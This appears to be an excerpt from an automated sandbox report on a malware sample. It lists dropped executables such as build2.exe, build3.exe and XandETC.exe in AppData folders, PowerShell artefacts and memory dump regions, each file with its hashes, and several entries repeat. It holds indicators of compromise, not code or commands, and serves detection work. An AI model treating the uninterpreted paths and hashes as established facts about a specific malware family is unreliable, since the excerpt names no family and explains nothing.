SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

memory/4804-500-0x0000018958C60000-0x0000018958C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_su5arbkg.2z2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4804-543-0x00007FF8AE410000-0x00007FF8AEED1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c97a801bb5d6c21c265ab7f283ba83e
SHA1 7c0a4cb73d63702a2d454268d983e0dcb36a8bf8
SHA256 69d9676a8c93686c904d9ce6193221476d6c72bc4d3250a232c03ccbeae380c7
SHA512 d3abd8bfccd3a3fec55c13e85e755fbd589e6ea04321169c7c8cf5badf7b6ffe96c0c2ed449a0b4a99ecfd1e7bb7edc3311d335c8956cf344c9584fb0bda50d9

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 6bb0e62356310422a56cc9f501f608fb
SHA1 c880c827b387f56b1009c270a0a14e220b1a4bf1
SHA256 2b04188a1fb6b12b72ceb5e63c4ea64f61dbe7aa9a0f3ed5f306e9184d56c1b0
SHA512 e4e71cf6d925a5e27522db3bc4c14d530a97d4e1992fc3f972e29d076feaf1226f0790721be37ca7b06ab757a775fbc24422d367abc6062f2f98973a48aa5c41